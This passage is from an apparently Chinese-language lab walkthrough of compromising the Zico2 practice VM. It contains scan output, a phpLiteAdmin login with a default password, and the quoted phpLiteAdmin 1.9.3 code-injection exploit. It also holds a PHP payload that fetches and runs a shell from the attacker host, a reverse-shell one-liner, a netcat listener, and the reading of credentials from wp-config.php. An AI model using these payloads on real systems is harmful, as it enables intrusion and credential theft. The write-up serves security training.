2.x branch.\n+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .\n+ \/css\/: Directory indexing found.\n+ \/css\/: This might be interesting.\n+ \/img\/: Directory indexing found.\n+ \/img\/: This might be interesting.\n+ \/icons\/README: Apache default file found. See: https:\/\/www.vntweb.co.uk\/apache-restricting-access-to-iconsreadme\/\n+ \/view.php?ariadne=http:\/\/blog.cirt.net\/rfiinc.txt?: Retrieved x-powered-by header: PHP\/5.3.10-1ubuntu3.26.\n+ \/#wp-config.php#: #wp-config.php# file found. This file contains the credentials.\n+ \/README.md: Readme Found.\n+ 8909 requests: 0 error(s) and 15 item(s) reported on remote host\n+ End Time: 2024-03-01 02:26:22 (GMT-5) (18 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u535a\u5ba2\u626b\u63cf<\/h3>\nwpscan --url http:\/\/192.168.244.129 --api-token=xxxxxxx\n# \u4e0d\u662fwordpress\u7684<\/code><\/pre>\nwhatweb 192.168.244.129\n#http:\/\/192.168.244.129 [200 OK] Apache[2.2.22], Bootstrap, Country[RESERVED][ZZ], Email[feedback@startbootstrap.com,your-email@your-domain.com], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.2.22 (Ubuntu)], IP[192.168.244.129], JQuery, Script, Title[Zico's Shop], X-UA-Compatible[IE=edge]<\/code><\/pre>\n\u5b9e\u5730\u8003\u5bdf<\/h3>\n
\u53d1\u73b0\u4e00\u5904\u6709\u610f\u601d\u7684\u5730\u65b9\uff1a<\/p>\n
<\/div><\/p>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n\u76ee\u5f55\u7a7f\u8d8a<\/h3>\n
\u521a\u521a\u770b\u5230\u7684\u7f51\u9875\uff0c\u5c1d\u8bd5\u76ee\u5f55\u7a7f\u8d8a<\/p>\n
<\/div><\/p>\n\u67e5\u770bweb\u76ee\u5f55<\/h3>\n
\u521a\u521a\u626b\u51fa\u6765\u4e86\u4e0d\u5c11\u76ee\u5f55\uff0c\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u53d1\u73b0\u7ba1\u7406\u5de5\u5177\u662fphpLiteAdmin<\/code>\u3002<\/p>\n\u5c1d\u8bd5\u4e07\u80fd\u5bc6\u7801\uff0c\u672a\u6210\u529f\uff0c\u5c1d\u8bd5\u5f31\u5bc6\u7801admin<\/code>\uff0c\u6210\u529f\u8fdb\u5165\uff1a<\/p>\n<\/div><\/p>\n\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u6570\u636e\uff0c\u53d1\u73b0\u654f\u611f\u6570\u636e\uff1a<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5\u8fdb\u884c\u7834\u8bd1\uff1a<\/p>\n
(root)653F4B285089453FE00E2AAFAC573414 --> 34kroot34\n(zico)96781A607F4E9F5F423AC01F0DAB0EBD --> zico2215@<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff0c\u9057\u61be\u7684\u662f\u5931\u8d25\u4e86\u3002<\/p>\n
\u67e5\u9605\u76f8\u5173\u6f0f\u6d1e<\/h3>\n
<\/div><\/p>\n# Exploit Title: phpliteadmin <= 1.9.3 Remote PHP Code Injection Vulnerability\n# Google Dork: inurl:phpliteadmin.php (Default PW: admin)\n# Date: 01\/10\/2013\n# Exploit Author: L@usch - http:\/\/la.usch.io - http:\/\/la.usch.io\/files\/exploits\/phpliteadmin-1.9.3.txt\n# Vendor Homepage: http:\/\/code.google.com\/p\/phpliteadmin\/\n# Vendor Status: Informed\n# Software Link: http:\/\/phpliteadmin.googlecode.com\/files\/phpliteadmin_v1-9-3.zip\n# Version: 1.9.3\n# Tested on: Windows and Linux\n\nDescription:\n\nphpliteadmin.php#1784: 'Creating a New Database' =>\nphpliteadmin.php#1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.',\n\nAn Attacker can create a sqlite Database with a php extension and insert PHP Code as text fields. When done the Attacker can execute it simply by access the database file with the Webbrowser.\n\nProof of Concept:\n\n1. We create a db named "hack.php".\n(Depending on Server configuration sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database \/ existing database to "hack.php".)\nThe script will store the sqlite database in the same directory as phpliteadmin.php.\nPreview: http:\/\/goo.gl\/B5n9O\nHex preview: http:\/\/goo.gl\/lJ5iQ\n\n2. Now create a new table in this database and insert a text field with the default value:\n<?php phpinfo()?>\nHex preview: http:\/\/goo.gl\/v7USQ\n\n3. Now we run hack.php\n\nDone!\n\nProof: http:\/\/goo.gl\/ZqPVL <\/code><\/pre>\n\u5199\u4e00\u4e2a\u9a6c\u8fdb\u53bb<\/h3>\n
<\/div><\/p>\n# zico2\n<?php system("wget 192.168.244.128:8888\/shell.txt -O \/tmp\/shell.php; php \/tmp\/shell.php"); ?>\n# kali shell.txt \n<?php $sock=fsockopen("192.168.244.128",1234);exec("\/bin\/sh -i <&3 >&3 2>&3");?>\npython3 -m http.server 8888\nnc -lvvp 1234<\/code><\/pre>\n<\/div><\/p>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u6269\u5c55shell<\/h3>\npython -c 'import pty;pty.spawn("\/bin\/sh")'\n\/bin\/bash<\/code><\/pre>\n\u67e5\u770b\u6587\u4ef6<\/h3>\ncd \/home\/zico\ncat to_do.txt<\/code><\/pre>\ntry list:\n- joomla\n- bootstrap (+phpliteadmin)\n- wordpress<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0bwordpress\u654f\u611f\u6587\u4ef6\uff1a<\/p>\n
cat wp-config.php<\/code><\/pre>\n<\/div><\/p>\n\u627e\u5230\u5bc6\u7801\uff1a<\/p>\n
zico\nsWfCsfJSPV9H3AmQzw8<\/code><\/pre>\n\u5207\u6362\u7528\u6237zico<\/h3>\nsu zico<\/code><\/pre>\n\u67e5\u770b\u57fa\u7840\u4fe1\u606f\uff1a<\/p>\n
sudo -l<\/code><\/pre>\n
![\"image-20240301170823805\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831441.png\")
<\/div><\/p>\n![\"image-20240301170926114\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831442.png\")
<\/div><\/p>\n![\"image-20240301171111601\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831443.png\")
<\/div>![\"image-20240301171129333\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831444.png\")
<\/div><\/p>\n![\"image-20240301171433385\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831445.png\")
<\/div><\/p>\n![\"image-20240301172036624\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831446.png\")
<\/div><\/p>\n![\"image-20240301175750788\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831447.png\")
<\/div><\/p>\n![\"image-20240301175610819\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831448.png\")
<\/div><\/p>\n![\"image-20240301180859781\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831449.png\")
<\/div><\/p>\n![\"image-20240301181358122\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831450.png\")
<\/div><\/p>\n![\"image-20240301182214839\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831451.png\")
<\/div><\/p>\n![\"image-20240301182522353\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831452.png\")
<\/div><\/p>\n![\"image-20240301182818892\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831453.png\")
<\/div><\/p>\n![\"image-20240301182915967\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831454.png\")
<\/div><\/p>\n